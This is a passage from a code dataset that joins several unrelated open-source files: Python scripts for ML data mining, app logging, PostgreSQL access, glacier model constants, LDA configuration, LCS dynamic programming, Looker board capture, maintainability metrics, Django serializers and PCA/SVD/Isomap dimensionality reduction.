tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init)\n v = sess.run(y[:,0])\n print(v) # will show you your variable.\ncm=confusion_matrix([0, 1, 0, 1], [1, 1, 1, 0])\nprint(cm)\ntn, fp, fn, tp = cm.ravel()\n","repo_name":"truongtud/data-mining-cup-2019","sub_path":"implementation/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"32690346320","text":"from logging import getLogger, StreamHandler, DEBUG, INFO, Formatter\n\nimport functools\nimport pathilico.pygletelm.effect as effect\nfrom pathilico.pygletelm.backend import program\n\nfrom pathilico.app.model import init_model\nfrom pathilico.app.update import update\nfrom pathilico.app.view import view\nfrom pathilico.app.subscriptions 
import subscriptions\nfrom pathilico.app.message import Msg\nfrom pathilico.app.main import load_dependencies\n\n\nLOGGING_CONFIG = dict(\n graphic_manager=\"INFO\",\n effect_executor=\"INFO\",\n backend=\"DEBUG\"\n)\n\n\ndef configure_app_logging_settings():\n stream_handler = StreamHandler()\n log_format = Formatter(\n '[%(asctime)s|%(name)s|%(levelname)s] %(message)s',\n datefmt='%H:%M:%S'\n )\n stream_handler.setFormatter(log_format)\n pathology_logger = getLogger(\"pfapp.Pathology\")\n pathology_logger.setLevel(INFO)\n pathology_logger.addHandler(stream_handler)\n annotation_logger = getLogger(\"pfapp.Annotation\")\n annotation_logger.setLevel(INFO)\n annotation_logger.addHandler(stream_handler)\n grouped_annotation_logger = getLogger(\"pfapp.GroupAnnotation\")\n grouped_annotation_logger.setLevel(INFO)\n grouped_annotation_logger.addHandler(stream_handler)\n grouped_annotation_logger = getLogger(\"pfapp.PickleDatabase\")\n grouped_annotation_logger.setLevel(DEBUG)\n grouped_annotation_logger.addHandler(stream_handler)\n\n\nSTR2SUB = {\n \"every\": effect.notify_every,\n \"once\": effect.notify_once\n}\n\n\nclass ScheduledBehavior(object):\n\n def __init__(self, subs=None):\n self.subscriptions = subs or effect.Subscriptions()\n\n def add_schedules(self, *subs):\n self.subscriptions = effect.Subscriptions(self.subscriptions, *subs)\n\n @classmethod\n def from_schedules(cls, schedules):\n \"\"\"Make the instance from tuple schedule\"\"\"\n subs = list()\n for sub_tuple in schedules:\n spec, msg, msg_kwargs = sub_tuple\n func = STR2SUB.get(spec[0], None)\n if func is None:\n continue\n s = func(msg, msg_kwargs, *spec[1:])\n subs.append(s)\n subs = effect.Subscriptions(*subs)\n return cls(subs)\n\n\ndef wrap_subscriptions_with_message_dispatcher(behaviors):\n def decorator(sub_func):\n @functools.wraps(sub_func)\n def wrapper(model):\n result = effect.Subscriptions(\n sub_func(model), behaviors.subscriptions\n )\n return result\n return wrapper\n return decorator\n\n\nif __name__ == \"__main__\":\n from pathilico.pygletelm.message import UnionMessage as Msg\n s = (\n ((\"every\", 5), Msg.Ok, dict(value=\"fuga\")),\n )\n schedule = ScheduledBehavior.from_schedules(s)\n print(schedule.subscriptions.effects)\n","repo_name":"yujota/pathilico","sub_path":"python/pathilico/misc/behavior_tools.py","file_name":"behavior_tools.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"14361689862","text":"from http import HTTPStatus\n\nimport psycopg2\nimport psycopg2.extras\nfrom psycopg2.errors import UniqueViolation\n\nfrom .maindb import set_up_tables, drop_all_tables\n\n\nclass PGConnection:\n \"\"\"Handles the main connection to the database\"\"\"\n\n def __init__(self, pg_url):\n\n try:\n self.conn = psycopg2.connect(pg_url)\n self.cur = self.conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)\n except Exception as ex:\n print(ex)\n\n def _execute_query(self, query, params=None, success_status=HTTPStatus.OK.value):\n try:\n self.cur.execute(query, params)\n self.conn.commit()\n except psycopg2.OperationalError as ex:\n self.conn.rollback()\n return str(ex), HTTPStatus.SERVICE_UNAVAILABLE.value\n except UniqueViolation as ex:\n self.conn.rollback()\n return str(ex), HTTPStatus.CONFLICT.value\n return self.cur, success_status\n\n def create_all_tables(self):\n \"\"\"Executes query creating all tables\"\"\"\n tables_to_create = set_up_tables()\n for query in tables_to_create:\n 
self.cur.execute(query)\n self.conn.commit()\n\n def drop_all_tables(self):\n \"\"\"Executes query deleting all tables\"\"\"\n tables_to_delete = drop_all_tables()\n for query in tables_to_delete:\n self.cur.execute(query)\n self.conn.commit()\n\n def save_income_data(self, query, params=None):\n \"\"\"Executes given query\"\"\"\n result, status = self._execute_query(query, params, success_status=HTTPStatus.CREATED.value)\n if status == HTTPStatus.CREATED.value:\n result = self.cur.fetchall()\n\n return result, status\n\n def fetch_one_row(self, query, params=None):\n \"\"\"Retrieves single row by given query\"\"\"\n result, status = self._execute_query(query, params)\n if status == HTTPStatus.OK.value:\n result = self.cur.fetchone()\n\n return result, status\n\n def fetch_all(self, query, params=None):\n \"\"\"Retrieves all results for query\"\"\"\n result, status = self._execute_query(query, params)\n if status == HTTPStatus.OK.value:\n result = self.cur.fetchall() or []\n\n return result, status\n","repo_name":"kostyanchick/ShopApi","sub_path":"service_api/db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"39279867328","text":"\"\"\"\n Declaration of constants\n Do not modify unless you are absolutely sure what you are doing.\n\"\"\"\n\n'Choose parameterisations'\nalbedo_method = 'Oerlemans98' # possibilities: 'Oerlemans98'\ndensification_method = 'Herron80' # possibilities: 'Herron80'\npenetrating_method = 'Bintanja95' # possibilities: 'Bintanja95'\nroughness_method = 'Moelg12' # possibilities: 'Moelg12'\nsaturation_water_vapour_method = 'Sonntag90' # possibilities: 'Sonntag90'\n\n' Initial constants'\ninitial_snowheight = 0.8 # Initial snow height\ninitial_snow_layer_heights = 0.1 # Initial thickness of snow layers\ninitial_glacier_height = 30.0 # Initial glacier height without snow layers\ninitial_glacier_layer_heights = 1. # Initial thickness of glacier ice layers\n\ninitial_top_density_snowpack = 300. # Top density for initial snowpack\ninitial_botton_density_snowpack = 600. # Bottom density for initial snowpack\n\ntemperature_top = 267.16 # Upper boundary condition for initial temperature profile (K)\ntemperature_bottom = 271. # Lower boundary condition for initial temperature profile (K)\nconst_init_temp = 0.1 # constant for init temperature profile used in exponential function (exponential decay)\n\nmerge_snow_threshold = 0.1 # (m) minimum height of a layer; decides whether freshly fallen snow is added as a new\n # layer or merged into the underlying layer\n\nminimum_snow_height = 0.01 # (m) minimum height of the last snow layer on the glacier\n # If there is only one snow layer left, it is only merged if its height\n # is lower than minimum_snow_height, even if merge_snow_threshold is greater\nminimum_snow_to_reset_albedo = 0.01 # minimum snowfall to reset hours since last snowfall! Default was 0.005\n\ndensity_fresh_snow = 250. # density of freshly fallen snow [kg m-3]\n\nalbedo_fresh_snow = 0.85 # albedo of fresh snow [-] (Moelg et al. 2012, TC)\nalbedo_firn = 0.55 # albedo of firn [-] (Moelg et al. 2012, TC)\nalbedo_ice = 0.3 # albedo of ice [-] (Moelg et al. 2012, TC)\nalbedo_mod_snow_aging = 22 # effect of ageing on snow albedo [days] (Moelg et al. 2012, TC)\nalbedo_mod_snow_depth = 3 # effect of snow depth on albedo [cm] (Moelg et al. 2012, TC)\nroughness_fresh_snow = 0.24 # surface roughness length for fresh snow [mm] (Moelg et al. 2012, TC)\nroughness_ice = 1.7 # surface roughness length for ice [mm] (Moelg et al. 2012, TC)\nroughness_firn = 4.0 # surface roughness length for aged snow [mm] (Moelg et al. 2012, TC)\naging_factor_roughness = 0.0026 # effect of ageing on roughness length (hours) 60 days from 0.24 to 4.0 => 0.0026\n\nsurface_emission_coeff = 0.97 # surface emission coefficient [-]\n\nsnow_ice_threshold = 900.0 # pore close-off density [kg m^(-3)]\nsnow_firn_threshold = 555.0 #\nthreshold_for_snowheight = 800.0 # density threshold when layer is classified as snow\n\n\nliquid_water_fraction = 0.05 # irreducible water content of a snow layer;\n # fraction of total mass of the layer [%/100]\npercolation_velocity = 0.0006 # percolation velocity for unsaturated layers [m s-1] (0.06 cm s-1)\n # how does it change with density?\n # Martinec, J.: Meltwater percolation through an alpine snowpack, Avalanche\n # Formation, Movement and Effects, Proceedings of the Davos Symposium, 162, 1987.\n\n' PHYSICAL CONSTANTS '\n\nlat_heat_melting = 3.34e5 # latent heat for melting [J kg-1]\nlat_heat_vaporize = 2.5e6 # latent heat for vaporization [J kg-1]\nlat_heat_sublimation = 2.834e6 # latent heat for sublimation [J kg-1]\nspec_heat_air = 1004.67 # specific heat of air [J kg-1 K-1]\nspec_heat_ice = 2050.00 # specific heat of ice [J kg-1 K-1]\nsigma = 5.67e-8 # Stefan-Boltzmann constant [W m-2 K-4]\ngravity_acceleration = 9.81 # acceleration of gravity (Braithwaite 1995) [m s-2]\n\n' MODEL CONSTANTS '\nwater_density = 1000.0 # density of water [kg m^(-3)]\nice_density = 917. # density of ice [kg m^(-3)]\n\nzero_temperature = 273.16 # Kelvin [K]\n\n' Densification constants '\nK0 = 11 # rate factors [-]\nK1 = 575\nE0 = 10260 # activation energy\nE1 = 21400\nR = 8.3144 # universal gas constant [J K-1 mol-1]\n","repo_name":"benatouba/cosipy","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":5280,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"24844084554","text":"\"\"\"\nVariables related to data or storage\n\"\"\"\n# Base URL for anonymous read access to Blob Storage container\nSTORAGE_CONTAINER = 'https://bostondata.blob.core.windows.net/scenario-document-collection-analysis/'\n\n# The AMLWorkbench folder used to save intermediate files in a run\n# Do NOT change it\nOUTPUT_PATH = 'outputs'\n\n# The dataset file name, change this to use a small dataset\n# DATASET_FILE = 'CongressionalDataAll_Jun_2017.tsv'\nDATASET_FILE = 'small_data.tsv'\n\n# The black list of words to ignore\nBLACK_LIST_FILE = 'black_list.txt'\n\n# The non-content bearing function words\nFUNCTION_WORDS_FILE = 'function_words.txt'\n\n\n\"\"\"\nVariables related to intermediate files\n\"\"\"\n# The file name used to save the cleaned and sentenced text data\nCLEANED_DATA_FILE_NAME = 'CongressionalDocsCleaned.tsv'\n\n# The learned phrases file\n# The file name will be renamed in the format of _phrase_.txt\nLEARNED_PHRASES_FILE = 'CongressionalDocsLearnedPhrases.txt'\n\n# The text data with phrase rewrites\n# The file name will be renamed in the format of _phrase_.txt\nPHRASE_TEXT_FILE = 'CongressionalDocsPhraseTextData.txt'\n\n# The model vocabulary and surface form mapping file\n# The file name will be renamed in the format of _phrase_.txt\nSURFACE_MAPPING_FILE = 'Vocab2SurfaceFormMapping.tsv'\n\n# The reconstituted text file name\n# The file name will be renamed in the format of _phrase_.txt\nRECONSTITUTED_TEXT_FILE = 
'CongressionalDocsProcessed.tsv'\n\n\n\n\"\"\"\nVariables related to run configuration\n\"\"\"\n# Maximum number of phrases to learn\nMAX_NUM_PHRASE = 1000\n\n# Maximum number of phrases to learn per iteration\nMAX_PHRASE_PER_ITER = 500\n\n# Maximum number of words allowed in the learned phrases\nMAX_PHRASE_LENGTH = 7\n\n# Minimum number of times a phrase must occur in the data to\n# be considered during the phrase learning process\nMIN_INSTANCE_COUNT = 5\n\n\n\"\"\"\nVariables related to train the LDA topic model\n\"\"\"\n# Minimum word count in the corpus\nMIN_WORD_COUNT = 5\n\n# Minimum count of documents that contain a specific word\nMIN_DOC_COUNT = 2\n\n# The maximum document frequency that contain a specific word\nMAX_DOC_FREQ = 0.25\n\n# The number of topics need to train\nNUM_TOPICS = 20\n\n# The number of iterations during training the LDA model\nNUM_ITERATIONS = 2000\n\n# Number of passes through the entire corpus\nNUM_PASSES = 1\n\n# Number of documents to load into memory at a time and process E step of EM\nCHUNK_SIZE = 1000\n\n# The random number during training the LDA model\nRANDOM_STATE = 1\n\n# The file name of LDA model file\n# This file name will be automatically renamed in the format of:\n# _____.pickle\nLDA_FILE = \"CongressionalDocsLDA.pickle\"\n\n# The transformed document topic probability matrix file\n# This file name will be automatically renamed in the format of:\n# _____.npy\nDOC_TOPIC_PROB_FILE = \"CongressionalDocTopicProbs.npy\"\n\n\n","repo_name":"Azure-Samples/MachineLearningSamples-DocumentCollectionAnalysis","sub_path":"Code/documentAnalysis/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"18"} +{"seq_id":"72328730921","text":"def lcsseq(str1, str2):\n if(len(str1) == 0 or len(str2) == 0):\n return 0\n\n if(str1[0] == str2[0]):\n return 1 + lcsseq(str1[1:], str2[1:])\n else:\n return max(lcsseq(str1, str2[1:]), lcsseq(str1[1:], str2))\n\nprint(lcsseq(\"abde\", \"aedwe\"))\n\n\ndef lcs_seq_dp(str1, str2):\n dp = [[0 for j in range(len(str2)+1)] for i in range(len(str1)+1)]\n\n for i in range(len(str1)+1):\n for j in range(len(str2)+1):\n if(i == 0 or j == 0):\n dp[i][j] = 0\n elif(str1[i-1] == str2[j-1]):\n dp[i][j] = dp[i-1][j-1] + 1\n else:\n dp[i][j] = max(dp[i][j-1], dp[i-1][j])\n\n print(dp)\n return dp[-1][-1]\n\nprint(lcs_seq_dp(\"abde\", \"aedwe\")) \n","repo_name":"sivakumarmedidi/WorkArounds","sub_path":"DSA/Algos/DP/lcsseq.py","file_name":"lcsseq.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70583476521","text":"import json\n\nfrom summarize_from_feedback.utils import blobs\n\n# ['id', 'subreddit', 'title', 'post', 'summary']\n# t3_1ov8e0 -> id\n# and k != \"subreddit\"\n\n\ndef tldr_filtered_generator(split):\n assert split in [\"test\", \"train\", \"valid\"]\n\n f = open('results_new.json', 'r')\n datas = json.load(f)\n datas = json.loads(datas)\n datas = datas['results']\n for data in datas:\n for artcle in data['articles']:\n yield dict(reference=data[\"event_synopis\"], article=artcle['headline'] + ' ' + \" \".join(artcle['article_body'].split()[:100]))\n\n\ndef tldr_filtered_queries_generator(split):\n assert split in [\"test\", \"train\", \"valid\"]\n\n gcs_path = f\"https://openaipublic.blob.core.windows.net/summarize-from-feedback/datasets/tldr_3_filtered_queries/{split}.jsonl\"\n with 
blobs.open_file_cached(gcs_path, \"rb\") as f:\n datas = [json.loads(l) for l in f.readlines()]\n\n for data in datas:\n # NOTE: don't use ref summary, not filtered\n yield dict(reference=data[\"summary\"], **{k: v for (k, v) in data.items() if k != \"summary\"})\n\n\nif __name__ == \"__main__\":\n for x in tldr_filtered_generator(\"train\"):\n print(list(x.keys()))\n break\n","repo_name":"badrinath-newzera/openai-summary-inference","sub_path":"summarize_from_feedback/datasets/tldr.py","file_name":"tldr.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74069774439","text":"target = 1000\n\n#We're making an assumption without loss of generality that a < b < c\nfor a in range(1,1000):\n for b in range(a,1000):\n c = 1000 - a - b\n if a**2 + b**2 == c**2:\n if a + b+ c == target:\n print('A: %f' % a)\n print('B: %f'% b)\n print(\"C: %f\" % c)\n print(a*b*c)\n break\n\n# I think the answer is 31875000","repo_name":"jdgsmallwood/ProjectEuler","sub_path":"project_euler_solutions/problem_9.py","file_name":"problem_9.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29979232508","text":"from tqdm import tqdm\nimport logging\nfrom lmanage.utils.errorhandling import return_sleep_message\nfrom lmanage.utils.looker_object_constructors import BoardObject\nfrom lmanage.utils import logger_creation as log_color\nfrom yaspin import yaspin\n#logger = log_color.init_logger(__name__, logger_level)\n\n\nclass CaptureBoards():\n def __init__(self, sdk):\n self.sdk = sdk\n\n def handle_board_structure(self, board_response: dict) -> dict:\n board_section_list = board_response.board_sections\n bs_list = []\n\n for board_section in board_section_list:\n board_item_list = board_section.board_items\n new_bi_list = [board_item.__dict__ for board_item in board_item_list] \n board_section['board_items'] = new_bi_list\n bs_dict = board_section.__dict__\n bs_list.append(bs_dict)\n\n board_response['board_sections'] = bs_list\n\n return board_response \n \n\n def get_all_boards(self) -> dict:\n response = []\n with yaspin().white.bold.shark.on_blue as sp:\n sp.text=\"getting all system board metadata (can take a while)\"\n all_system_boards = self.sdk.all_boards()\n \n for board in all_system_boards:\n bresponse = self.handle_board_structure(board_response=board)\n b = BoardObject(\n content_metadata_id=board.content_metadata_id,\n section_order=board.section_order,\n title=board.title,\n primary_homepage=board.primary_homepage,\n description=board.description,\n board_sections=bresponse.board_sections\n )\n response.append(b)\n return response\n\n\n def execute(self):\n all_boards = self.get_all_boards()\n return all_boards","repo_name":"looker-open-source/lmanage","sub_path":"lmanage/capturator/content_capturation/board_capture.py","file_name":"board_capture.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"22578383463","text":"import json\nimport os\nimport subprocess\nfrom xml.dom import minidom\n\nfrom exit_codes import ExitCode, log_err\n\nMI_EXTENSIONS = [\"c\", \"cc\", \"cpp\", \"c++\"]\n\n\nclass Mi:\n def __init__(self, path):\n self.mi_path = os.path.join(path, \"Maintainability_Index\", \"lizard\")\n\n def run_n_parse_mi(self, files_list: list, output_dir: os.path):\n mi_tool_res = 
self.run_tool_mi(files_list)\n return mi_tool_output_reader(mi_tool_res.decode())\n\n def run_tool_mi(self, files_list: list):\n try:\n args = [self.mi_path, \"-X\"]\n args.extend(files_list)\n results = subprocess.run(args, capture_output=True, check=True)\n return results.stdout\n\n except subprocess.CalledProcessError as ex:\n log_err(\n \"\\tMaintainability Index Tool exited with an error.\\n{}\\n{}\\n\",\n ExitCode.MI_TOOL_ERR,\n ex.stdout,\n ex.stderr,\n )\n\n\ndef mi_tool_output_reader(xml_str: str):\n xml = minidom.parseString(xml_str)\n\n global_metrics = {}\n\n per_function_res = []\n per_file_res = []\n\n def _get_label_list(measure_tag):\n label_list = []\n\n labels = measure_tag.getElementsByTagName(\"label\")\n for label in labels:\n label_list.append(label.firstChild.nodeValue)\n\n return label_list\n\n def _get_values_object(item_tag, label_list):\n metrics_output = {}\n\n # Get metrics values of a file\n values = item_tag.getElementsByTagName(\"value\")\n for label, value in zip(label_list, values):\n if label == \"Maintainability\":\n # To have the standard MI formula\n metrics_output[label] = int(\n float(value.firstChild.nodeValue) * 171 / 100\n )\n else:\n metrics_output[label] = value.firstChild.nodeValue\n\n return metrics_output\n\n measures = xml.getElementsByTagName(\"measure\")\n\n for measure in measures:\n if measure.getAttribute(\"type\") == \"Function\":\n # Get metrics name\n per_function_list = _get_label_list(measure)\n\n items = measure.getElementsByTagName(\"item\")\n for item in items:\n # Get name, start row and filename of a function\n name = item.getAttribute(\"name\")\n func_name = name[0 : name.find(\"(...) at \")]\n line_number = name[name.rfind(\":\") + 1 :]\n file_in = name[name.find(\"(...) at \") + 9 : name.rfind(\":\")]\n\n # Get metrics values of a function\n per_function_values = _get_values_object(\n item, per_function_list\n )\n\n per_function_res.append(\n {\n \"filename\": file_in,\n \"func_name\": func_name,\n \"line_number\": line_number,\n \"values\": per_function_values,\n }\n )\n elif measure.getAttribute(\"type\") == \"File\":\n\n # Get global metrics for each file\n per_file_list = _get_label_list(measure)\n\n items = measure.getElementsByTagName(\"item\")\n for item in items:\n\n # Get metrics values of a file\n metrics_output = _get_values_object(item, per_file_list)\n\n output = {\n \"filename\": item.getAttribute(\"name\"),\n **metrics_output,\n }\n\n per_file_res.append(output)\n\n # Get global metrics computed using all files\n sum_tags = measure.getElementsByTagName(\"sum\")\n for tag in sum_tags:\n global_metrics[tag.getAttribute(\"lable\")] = tag.getAttribute(\n \"value\"\n )\n\n global_metrics[\"files\"] = []\n for global_file in per_file_res:\n\n global_file[\"functions\"] = []\n for func_name in per_function_res:\n if func_name[\"filename\"] == global_file[\"filename\"]:\n global_file[\"functions\"].append(func_name)\n\n global_metrics[\"files\"].append(global_file)\n\n return global_metrics\n\n\ndef standardizer_mi(data):\n\n formatted_output = {}\n\n formatted_output[\"LOC\"] = int(data[\"NCSS\"])\n formatted_output[\"CC\"] = float(data[\"CCN\"])\n formatted_output[\"classes\"] = []\n formatted_output[\"files\"] = []\n\n for file in data[\"files\"]:\n files = {}\n files[\"filename\"] = file[\"filename\"]\n files[\"LOC\"] = int(file[\"NCSS\"])\n files[\"CC\"] = float(file[\"CCN\"])\n files[\"MI\"] = float(file[\"Maintainability\"])\n\n files[\"functions\"] = []\n for func_name in file[\"functions\"]:\n funcs = {}\n 
funcs[\"function name\"] = func_name[\"func_name\"]\n funcs[\"line number\"] = func_name[\"line_number\"]\n\n funcs[\"LOC\"] = int(func_name[\"values\"][\"NCSS\"])\n funcs[\"CC\"] = float(func_name[\"values\"][\"CCN\"])\n funcs[\"MI\"] = float(func_name[\"values\"][\"Maintainability\"])\n files[\"functions\"].append(funcs)\n\n formatted_output[\"files\"].append(files)\n\n return formatted_output\n\n\ndef helper_test_mi(standardized_output: dict, output: dict):\n\n output[\"LOC\"] = standardized_output[\"LOC\"]\n output[\"CC\"] = standardized_output[\"CC\"]\n output[\"classes\"] = standardized_output[\"classes\"]\n output[\"files\"] = []\n\n for file in standardized_output[\"files\"]:\n file_metrics = {\n \"filename\": file[\"filename\"],\n \"LOC\": file[\"LOC\"],\n \"CC\": file[\"CC\"],\n \"MI\": file[\"MI\"],\n \"functions\": file[\"functions\"],\n }\n output[\"files\"].append(file_metrics)\n","repo_name":"SoftengPoliTo/SoftwareMetrics","sub_path":"mi.py","file_name":"mi.py","file_ext":"py","file_size_in_byte":5733,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"70029207719","text":"from rest_framework import serializers\n\nfrom core.serializers import SemesterSerializer\nfrom core.serializers import UserSimpleSerializer\nfrom members.models import Member\n\n\nclass MemberSerializer(serializers.ModelSerializer):\n semester = SemesterSerializer(read_only=True, required=False)\n seller = UserSimpleSerializer(read_only=True)\n last_edited_by = UserSimpleSerializer(read_only=True)\n\n class Meta:\n model = Member\n fields = (\n \"id\",\n \"name\",\n \"email\",\n \"date_joined\",\n \"semester\",\n \"lifetime\",\n \"honorary\",\n \"date_lifetime\",\n \"uio_username\",\n \"seller\",\n \"comments\",\n \"last_edited_by\",\n )\n\n\nclass AddMemberSerializer(serializers.Serializer):\n name = serializers.CharField(\n max_length=50, help_text=\"name of user, max 50 letters\"\n )\n email = serializers.EmailField(allow_blank=True)\n lifetime = serializers.BooleanField(help_text=\"Is the member a lifetime member?\")\n uio_username = serializers.CharField(\n max_length=15,\n allow_blank=True,\n required=False,\n help_text=\"Your Uio username. 
Is optional.\",\n )\n\n\nclass MemberSimpleSerializer(serializers.Serializer):\n class Meta:\n model = Member\n fields = (\n \"id\",\n \"name\",\n \"email\",\n \"date_joined\",\n \"semester\",\n \"lifetime\",\n \"honorary\",\n \"date_lifetime\",\n \"uio_username\",\n \"seller\",\n \"comments\",\n \"last_edited_by\",\n )\n\n\nclass MemberSemesterSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n semester = serializers.CharField()\n lifetime = serializers.IntegerField(\n help_text=\"Number of lifetimemembers sold that semester\"\n )\n normal = serializers.IntegerField(\n help_text=\"Number of normal semester members that semester\"\n )\n honorary = serializers.IntegerField(\n help_text=\"Number of honnorary memberships givenout that semester\"\n )\n","repo_name":"cybernetisk/internsystem","sub_path":"members/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"13531811314","text":"# encoding=utf-8\nimport numpy as np\nfrom collections import Counter\nfrom itertools import product\nfrom dijkstar import Graph\nfrom dijkstar.algorithm import single_source_shortest_paths\nimport time\n\nsonar_test = './sonar-test.txt'\nsonar_train = './sonar-train.txt'\nsplice_test = './splice-test.txt'\nsplice_train = './splice-train.txt'\nmax_dis = float(\"inf\")\nisomap_k = 12\n\n\"\"\"\nUse a property of Laplacian matrix to judge weather the graph is connected.\nThe property is that The number of times 0 appears as an eigenvalue in the Laplacian\nis the number of connected components in the graph.\n\"\"\"\ndef is_connected(graph_mat, max_dis):\n n = graph_mat.shape[0]\n adjacency_mat = np.tile(np.matrix(np.tile(0, n)).transpose(), n)\n\n def f(x, y):\n adjacency_mat[x, y] = 1\n\n list((f(i, j) for i, j in product(range(n), range(n)) if graph_mat[i, j] != max_dis and i != j))\n degree = np.sum(adjacency_mat, axis=1).transpose().tolist()[0]\n degree_mat = np.diag(degree)\n laplacian_matrix = degree_mat - adjacency_mat\n eigenvalues, eigenvectors = np.linalg.eig(laplacian_matrix)\n zeros = [e for e in eigenvalues if abs(e) < 1e-10]\n return True if len(zeros) == 1 else False\n\n\n# Get the k nearest points\ndef knn_point(train_mat, test_vec, k):\n test_mat = np.tile(test_vec, train_mat.shape[1])\n dis_mat = np.sqrt(np.square(train_mat - test_mat).sum(axis=0))\n dis_min_k = np.argsort(dis_mat).tolist()[0][0:k]\n return dis_min_k, dis_mat\n\n\n# Implementation of K-NN\ndef knn_label(train_mat, train_labels, test_vec, k):\n dis_min_top_k = knn_point(train_mat, test_vec, k)[0]\n labels = [train_labels[i] for i in dis_min_top_k]\n if k == 1:\n return labels[0]\n count_labels = Counter(labels)\n order_labels = sorted(count_labels.items(), key=lambda d: d[1])\n return order_labels[len(order_labels) - 1][0]\n\n\n# Calculate the accuracy of predicting the label of testing examples\ndef train_test(train_mat_low, train_label, test_mat_low, test_label, knn_k, top_k):\n total_test = test_mat_low.shape[1]\n right = 0\n for i in range(total_test):\n label_pre = knn_label(train_mat_low, train_label, test_mat_low[:, i], knn_k)\n if label_pre == test_label[i]:\n right += 1\n if top_k > 0:\n print(\"k = %d and the accuracy is %d / %d = %f\" % (top_k, right, total_test, right / total_test))\n else:\n print(\"the accuracy is %d / %d = %f\" % (right, total_test, right / total_test))\n\n\n# Read training and testing data to matrices\ndef read_data(data_file):\n data_raw = 
[]\n data_label = []\n file = open(data_file, 'r')\n for line in file:\n row_raw = line.strip('\\n').split(',')\n data_raw.append(row_raw[0:len(row_raw) - 1])\n data_label.append(row_raw[len(row_raw) - 1])\n return np.matrix(data_raw, dtype=np.float).transpose(), data_label\n\n\n# Use the data to learn the projection matrix.\ndef pca_pro_mat(data_mat, k):\n # remove means\n mean_vec = np.mean(data_mat, axis=1)\n # print(mean_vec.shape)\n data_mat = data_mat - mean_vec\n # calculate the covariance matrix\n covariance_mat = np.cov(data_mat)\n # calculate the eigenvalues and the eigenvectors of the covariance matrix\n eigenvalues, eigenvectors = np.linalg.eig(covariance_mat)\n # calculate the k largest eigenvectors\n eigenvalues_top_k = np.argsort(-eigenvalues)[0:k]\n eigenvectors_top_k = eigenvectors[:, eigenvalues_top_k]\n return eigenvectors_top_k\n\n\n# Project the data and to the lower-dimensional space via the projection matrix\ndef pca(data_mat, pro_mat):\n # data_mat_low = (data_mat.transpose() * pro_mat).transpose()\n # print(pro_mat.shape, data_mat.shape)\n data_mat_low = pro_mat.transpose() * data_mat\n # print(data_mat_low.shape)\n return data_mat_low\n\n\n# Main method for testing PCA\ndef pca_main(train_mat, train_label, test_mat, test_label, ks):\n t1 = time.time()\n for k in ks:\n pro_mat = pca_pro_mat(train_mat, k)\n train_mat_low = pca(train_mat, pro_mat)\n test_mat_low = pca(test_mat, pro_mat)\n train_test(train_mat_low, train_label, test_mat_low, test_label, 1, k)\n print('cost: %f s\\n' % (time.time() - t1))\n\n\n# Use the data to learn the projection matrix.\ndef svd_w(data_mat, k):\n # use the existing tools directly to conduct SVD of a matrix\n u, s, v = np.linalg.svd(data_mat)\n return u[:, 0:k]\n\n\n# Project the data and to the lower-dimensional space via the projection matrix\ndef svd(data_mat, w):\n return w.transpose() * data_mat\n\n\n# Main method for testing SVD\ndef svd_main(train_mat, train_label, test_mat, test_label, ks):\n t1 = time.time()\n for k in ks:\n w = svd_w(train_mat, k)\n train_mat_low = svd(train_mat, w)\n test_mat_low = svd(test_mat, w)\n train_test(train_mat_low, train_label, test_mat_low, test_label, 1, k)\n print('cost: %f s\\n' % (time.time() - t1))\n\n\n# Calculate the k that makes the graph connected.\ndef min_k_connected(train_mat, test_mat):\n k = 4\n while True:\n mat = graph_knn(train_mat, test_mat, k)\n if is_connected(mat, max_dis):\n print('k = %d, the graph is connected.' 
% k)\n return k\n k += 1\n\n\n# Use K-NN to construct a weighted graph\ndef graph_knn(train_mat, test_mat, k):\n data_mat = np.column_stack((train_mat, test_mat))\n n = data_mat.shape[1]\n mat = np.matrix(np.tile(max_dis, n)).transpose()\n mat = np.tile(mat, n)\n for i in range(data_mat.shape[1]):\n top_k_points, dis_mat = knn_point(data_mat, data_mat[:, i], k + 1)\n for j in top_k_points:\n mat[i, j] = dis_mat[0, j]\n mat[j, i] = dis_mat[0, j]\n return mat\n\n\n# Generate the distance matrix\ndef dist_mat(train_mat, test_mat, k):\n # construct a weighted graph\n mat = graph_knn(train_mat, test_mat, k)\n n = mat.shape[0]\n graph = Graph()\n list((graph.add_edge(i, j, {'cost': mat[i, j]}) for i, j in product(range(n), range(n)) if\n i != j and mat[i, j] != max_dis))\n if graph is None:\n return\n cost_func = lambda u, v, e, prev_e: e['cost']\n mat = np.zeros((n, n))\n # the shortest path from node i to node j is the distance between i and j\n def dis(i):\n single_short_path = single_source_shortest_paths(graph, i, cost_func=cost_func)\n for j in range(n):\n if j != i:\n mat[i, j] = extract_shortest_path(single_short_path, j)\n else:\n mat[i, j] = 0\n 